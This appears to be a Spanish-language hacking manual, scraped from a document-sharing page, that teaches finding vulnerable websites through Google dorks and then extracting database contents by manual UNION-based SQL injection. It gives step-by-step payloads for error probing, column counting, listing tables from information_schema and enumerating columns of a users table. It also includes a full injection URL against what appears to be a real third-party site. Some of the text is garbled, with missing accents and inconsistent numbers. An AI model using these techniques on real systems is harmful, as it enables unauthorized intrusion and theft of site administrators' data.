Вы находитесь на странице: 1из 8

BRISEO CHRISTIAN

MANUAL

Dorks:

Los Dorks son palabras claves que usaremos para encontrar sitios vulnerables.
Un ejemplo de dork seria el siguiente: noticia.php?id=
En google deberamos poner lo siguiente: inurl: noticia.php?id=
Esto nos arrojara muchos resultados de sitios que quizs ya no sean
vulnerables. Pero es por eso que debemos ir alternando Dorks, hasta que
logremos dar con una.
El mtodo para generar dorks seria cambiar el noticia por otro nombre, por
ejemplo news, view, photo, etc. Y el resto quedara igual.
Otra de las cosas a tener en cuenta, es que despus de realizar la bsqueda, ir
a las pginas del final que son las que ms desactualizadas estn y
probablemente sean vulnerables.
Veremos a continuacin un ejemplo:

Coloco el Dork en google y comienzo a navegar, buscando webs que puedan


llegar a ser vulnerables. Yo encontr esta:

Como se puede ver, ah en la url aparece el dork que coloque en google


Pero cmo me doy cuenta si es o no vulnerable?

Ac empieza la parte entretenida. Lo que debemos hacer es borrar lo que esta


despus de id= y provocar un error en la base de datos.

BRISEO CHRISTIAN

Y de qu forma podemos provocar un error?


Fcil colocando caracteres no permitidos, por ejemplo una comilla, un
numero negativo, etc. Colocare un -1 (uno negativo) y veremos cmo se
comporta la web

Pagina original:

Pagina con el -1:

BRISEO CHRISTIAN

Se puede notar que no han cargado elementos dentro del cuerpo de la pgina,
esto da seal a que puede ser vulnerable.
Ahora probemos colocando una comilla:

Nos tira un error de la base de datos:


Con esto podemos ver que pudimos generar un error en la consulta a la base
de datos.

SQL Injection

Ahora probaremos si realmente es vulnerable o no a SQLi. Para ello, despus


del id= colocaremos lo siguiente:
-1+UNION+SELECT+1,2

BRISEO CHRISTIAN

Y en mi caso, en el cuerpo de la pgina, me sale el mismo Fatal error que


cuando ingrese la comilla simple.
Lo que debemos hacer ahora, es comenzar a aadir nmeros, hasta que ese
error desaparezca.

La inyeccin seria as:


-1+UNION+SELECT+1,2
-1+UNION+SELECT+1,2,3
-1+UNION+SELECT+1,2,,3,4
Y asi sucesivamente hasta que el error desaparezca. En mi caso quedo hasta
el numero 11, pero hay ocasiones en las que puede superar los 60!

Cuando el error ya no este, nos volver a mostrar la pagina, y curiosamente


contiene uno o mas nmeros en el cuerpo de la web

BRISEO CHRISTIAN

Ese 4 y ese 6, son nmeros de tablas, la web es vulnerable a SQLi. En este


caso debo elegir uno de los dos nmeros, yo seleccionare el 5 por que es el
mas vistoso, pero en definitiva se puede usar cualquiera.
Usare a ese 4 para que me muestre los nombres de las tablas en su lugar.
Lo que sigue ahora es agregar despus del ltimo nmero de la url el siguiente
cdigo:
+from+information_schema.tables--

Y reemplazar el nmero 4 (que fue el numero que nos apareci en el cuerpo


de la pagina) por table_name

Una vez hecho esto, presionamos enter y veremos que en el cuerpo del
mensaje nuestro numero desapareci y apareci el nombre de una tabla en su
lugar.

Lo que debemos hacer ahora, es agregar despus de


information_schema.tables lo siguiente:

BRISEO CHRISTIAN

Y si miramos el cuerpo del mensaje, el nombre de la tabla, cambi

Lo que sigue, es ir sumndole +1 al limit para que valla de forma creciente,


hasta encontrar una tabla que pueda contener los datos del administrador de la
pgina
El limit debera ir de la siguiente forma:
+limit+2,1
+limit+3,1
+limit+4,1
+limit+5,1

Y as sucesivamente hasta hallar una tabla importante. En mi caso llegue hasta


la 26 y encontr la de usuarios .

BRISEO CHRISTIAN

Lo que sigue, es convertir ese nombre a ASCII. Asique buscaremos en google


algn conversor de string a ascii.

Ahora sacaremos los espacios que hay entre los nmeros y colocaremos
comas entre los valores:
085,083,069,082,095,080,082,073,086,073,076,069,071,069.083

Guardaremos esa cadena de nmeros para usarla luego en nuestra inyeccin.


Ahora volvemos a nuestra inyeccin y
cambiaremos table_name por group_concat(column_name) yinformation_s
chema.tables nos quedara haci
http://alovera.es/agenda.php?id=1+UNION+SELECT+1,2,3,group_concat(column_name),5,6,7,8,9,10,11+from+i
nformation_schema.columns+where+table_name=char(085,083,069,082,095,0
80,082,073,086,073,076,069,071,069.083)--

BRISEO CHRISTIAN

Si observamos, el cuerpo de la pgina, veremos la composicin de las


columnas de la tabla

Como hemos visto esta es una forma de poder ver si es vulnerable la pagina
web

Вам также может понравиться